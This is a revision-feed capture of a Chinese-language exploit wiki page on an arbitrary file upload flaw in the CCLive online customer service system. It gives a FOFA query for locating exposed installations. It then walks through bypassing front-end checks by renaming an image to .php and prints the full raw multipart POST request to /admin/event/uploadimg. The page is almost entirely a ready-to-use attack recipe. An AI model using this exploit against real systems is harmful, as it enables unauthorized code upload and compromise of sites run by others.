https://pwnwiki.com/index.php?action=history&feed=atom&title=CCLive%E5%9C%A8%E7%B7%9A%E5%AE%A2%E6%9C%8D_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E CCLive在線客服 任意文件上傳漏洞 - Revision history 2026-04-26T15:30:36Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CCLive%E5%9C%A8%E7%B7%9A%E5%AE%A2%E6%9C%8D_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&diff=3592&oldid=prev Pwnwiki: Created page with "==FOFA== <pre> title="CCLive在线客服系统" </pre> ==漏洞利用== 訪問URL進入在線客服頁面,然後從圖片上傳處進行抓包 <pre> /index/index/home?visit..." 2021-05-27T07:06:05Z <p>Created page with &quot;==FOFA== &lt;pre&gt; title=&quot;CCLive在线客服系统&quot; &lt;/pre&gt; ==漏洞利用== 訪問URL進入在線客服頁面,然後從圖片上傳處進行抓包 &lt;pre&gt; /index/index/home?visit...&quot;</p> <p><b>New page</b></p><div>==FOFA==<br /> &lt;pre&gt;<br /> title=&quot;CCLive在线客服系统&quot;<br /> &lt;/pre&gt;<br /> <br /> ==漏洞利用==<br /> 訪問URL進入在線客服頁面,然後從圖片上傳處進行抓包<br /> &lt;pre&gt;<br /> /index/index/home?visiter_id=&amp;visiter_name=&amp;avatar=&amp;business_id=1&amp;groupid=0&amp;special=1 <br /> &lt;/pre&gt;<br /> <br /> 將png後綴修改為php,以這樣的方式來繞過前端驗證:<br /> &lt;pre&gt;<br /> POST /admin/event/uploadimg HTTP/1.1<br /> Host: url<br /> Cookie: PHPSESSID=utrvj3a4vmncvmiaknccmt17nr<br /> Content-Length: 721<br /> Accept: application/json, text/javascript, */*; q=0.01<br /> Origin: url<br /> X-Requested-With: XMLHttpRequest<br /> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0<br /> Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWvBQTUlpjNAdVfUt<br /> Referer: url/index/index?code=v9zzfNPShXGiImqm%2BjTb52DPR%2B%2BcnjEIFN4Q%2BfnbLgkNxmOgGDfmOzNSL49%2B0SCZHhjvyJZc%2BNPFyOv33HNisSF5hkaZW0w4QFZkqCzXmWx9Bi0GXxAdBo0MVIuqTye2XlFYUQ<br /> Accept-Encoding: gzip, deflate<br /> Accept-Language: zh-CN,zh;q=0.8<br /> Connection: close<br /> ------WebKitFormBoundaryWvBQTUlpjNAdVfUt<br /> Content-Disposition: form-data; name=&quot;editormd-image-file&quot;; filename=&quot;1.jpg.php&quot;<br /> Content-Type: image/png<br /> text<br /> ------WebKitFormBoundaryWvBQTUlpjNAdVfUt<br /> Content-Disposition: form-data; name=&quot;visiter_id&quot;<br /> YKs5EmtR<br /> ------WebKitFormBoundaryWvBQTUlpjNAdVfUt<br /> Content-Disposition: form-data; name=&quot;business_id&quot;<br /> zzcc520<br /> ------WebKitFormBoundaryWvBQTUlpjNAdVfUt<br /> Content-Disposition: form-data; name=&quot;avatar&quot;<br /> /assets/images/index/avatar-red2.png<br /> ------WebKitFormBoundaryWvBQTUlpjNAdVfUt<br /> Content-Disposition: form-data; name=&quot;record&quot;<br /> ------WebKitFormBoundaryWvBQTUlpjNAdVfUt<br /> Content-Disposition: form-data; name=&quot;service_id&quot;<br /> 13<br /> ------WebKitFormBoundaryWvBQTUlpjNAdVfUt--<br /> &lt;/pre&gt;</div> Pwnwiki